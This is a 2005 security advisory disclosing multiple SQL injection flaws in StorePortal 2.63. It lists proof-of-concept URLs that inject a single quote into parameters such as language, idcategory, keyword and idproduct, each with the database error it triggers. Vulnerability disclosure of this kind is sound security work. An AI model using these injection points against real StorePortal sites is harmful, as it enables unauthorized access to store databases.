Multiple SQL Injections in StorePortal 2.63
Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn
more at http://www.digitalparadox.org/services.ah
Severity: High
Title: Multiple SQL Injections in StorePortal 2.63
Date: 24/04/2005
Vendor: StorePortal
Vendor Website: http://www.storeportal.com/
Summary: There are, multiple sql injections in storeportal 2.63.
Proof of Concept Exploits:
These sql injections are caused by the referrer, of these pages called, and are
only exploitable if u visit them after visiting
default.asp
http://localhost/default.asp?language='sqlinjection
SQL INJECTION
ERROR MESSAGE !
Store Portal Errors Occured!
Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error
(missing operator) in query expression
''/default.asp?language='sqlinjection&','')'.
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers
http://localhost/default.asp?id=1&opr=2&%3bpic='sql_injection_
SQL INJECTION
ERROR MESSAGE !
Store Portal Errors Occured!
Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error
(missing operator) in query expression
''/default.asp?id=1&opr=2&pic='sql_injection_&','')'.
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers
http://localhost/default.asp?opr=35&id=1&idcategory='sql_injection_&idcategoryp=1
SQL INJECTION
ERROR MESSAGE !
Store Portal Errors Occured!
Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error
(missing operator) in query expression
''/default.asp?opr=35&id=1&idcategory='sql_injection_&idcategoryp=1&','')'.
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers
http://localhost/default.asp?opr=35&id=1&idcategory=1&idcategoryp='sql_injection_
SQL INJECTION
Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error
(missing operator) in query expression
''/default.asp?opr=35&id=1&idcategory=1&idcategoryp='sql_injection_&','')'.
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers
http://localhost/default.asp?mnu=&id=1&opr=5&content='sql_injection_
SQL INJECTION
Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error
(missing operator) in query expression
''/default.asp?mnu=&id=1&content='sql_injection_&opr=5&','')'.
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers
http://localhost/default.asp?id=1&opr=4&keyword='sql_injection_
SQL INJECTION
Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error
(missing operator) in query expression 'IdCategoriaInfo = 1 and
Visible =
'true' and '20050424' >= DataPubblicazione and (DataExpire <= ' 20050424' or
DataExpire is null or DataExpire = '') and (Name like
'%'sql_injection_%' or Body like '%'sql_injection_%')'.
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers
http://localhost/default.asp?opr=41&idcategory=11&idcategoryp=11&id=1&idproduct='sql_injection_
SQL INJECTION
ERROR MESSAGE !
Store Portal Errors Occured!
Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error
(missing operator) in query expression
''/default.asp?opr=41&idcategory=11&idcategoryp=11&id=1&idproduct='sql_injection_&','')'.
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah
Author:
These vulnerabilties have been found and released by Diabolic Crab, Email:
dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel
free to
contact me regarding these vulnerabilities. You can find me at,
http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for
my soon to come
out book on Secure coding with php.